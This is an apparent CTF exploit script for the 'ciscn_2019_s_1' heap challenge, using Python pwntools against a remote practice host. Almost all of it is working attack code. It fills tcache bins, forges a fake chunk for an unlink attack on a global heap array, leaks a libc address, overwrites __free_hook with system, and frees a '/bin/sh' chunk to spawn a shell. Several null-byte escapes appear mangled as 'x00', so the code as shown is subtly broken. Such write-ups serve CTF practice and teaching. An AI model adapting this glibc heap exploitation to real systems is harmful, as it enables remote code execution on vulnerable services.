ciscn_2019_s_1

exp

from pwn_debug import *

file_name = './ciscn_s_1'
libc_name = './libc/libc-2.27.so'
context.binary = file_name
context.log_level = 'debug'
#context.terminal = ['./hyperpwn/hyperpwn-client.sh']
pdbg = pwn_debug(file_name)
pdbg.local('/home/ki/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so',
'/home/ki/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-linux-x86-64.so.2')
pdbg.remote('node3.buuoj.cn',25992)
p = pdbg.run('remote')

#elf = pdbg.elf
#libc = pdbg.libc
elf = ELF(file_name)
libc = ELF(libc_name)

key2 = 0x6022b8
heaplist = 0x6020E0

def add(idx,size,content):
    p.sendafter('4.show',str(1))
    p.sendafter('index:',str(idx))
    p.sendafter('size:',str(size))
    p.sendafter('content:',content)

def free(idx):
    p.sendafter('4.show',str(2))
    p.sendafter('index:',str(idx))

def edit(idx,content):
    p.sendafter('4.show',str(3))
    p.sendafter('index:',str(idx))
    p.sendafter('content:',content)

#add(30,256,flat(0,0x190,heaplist + 30 * 0x8 - 0x18,heaplist + 30 * 0x8 - 0x10))# 0
#add(31,136,'bbbb')# 1
#add(32,256 - 0x10,'cccc')# 2

#add(31,256,flat(0,0x,heaplist + 31 * 0x8 - 0x18,heaplist + 31 * 0x8 - 0x10))
#add(32,256 - 0x10,'cccc')
#edit(31,flat(0,0x,heaplist + 31 * 0x8 - 0x18,heaplist + 31 * 0x8 - 0x10))

#add(31,0xf8,'aaaa')
#add(32,0xf8,flat(heaplist + 32 * 0x8 - 0x18,heaplist + 32 * 0x8 - 0x10).ljust(0xf0,'x00') + p64(256))


for i in range(1,8):
    add(i,0xf8,'aaaa')
    
add(32,0xf8,'aaaa')# 32
add(9,0xf8,'aaaa')# 9

for i in range(1,8):
    free(i)

#edit(31,128 * 'x00' + p64(0x190))

edit(32,flat(0,0xf0,heaplist + 32 * 0x8 - 0x18,heaplist + 32 * 0x8 - 0x10).ljust(0xf0,'x00') + p64(256 - 0x10))
free(9)

edit(32,flat(0x601fa0,0,0,0x6021e0).ljust((0x18 + 216),'x00') + p32(0x1) + p32(0x100))

#for i in range(10,17):
#    add(i,0xf8,'aaaa')

#p.sendafter('4.show',str(1))
#p.sendafter('index:',str(18))
#p.sendafter('size:',str(0xf8))
#p.recvuntil('gift: ')
#heap_addr_18 = int(p.recvuntil('content:
')[:-10],16)
#p.send('aaaa')
#print 'heap_addr_18:' + hex(heap_addr_18)

#add(29,128,'aaaa')

#for i in range(10,18):
#    free(i)

#edit(29,p64(heap_addr_18))

p.sendafter('4.show',str(4))
p.sendafter('index:',str(29))

free_addr = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00'))
print "free_addr:" + hex(free_addr)

libcbase = free_addr - libc.symbols['free']
system = libcbase + libc.symbols['system']
free_hook = libcbase + libc.symbols['__free_hook']

edit(32,p64(free_hook))
edit(32,p64(system))

add(20,128,'/bin/shx00')

free(20)

p.interactive()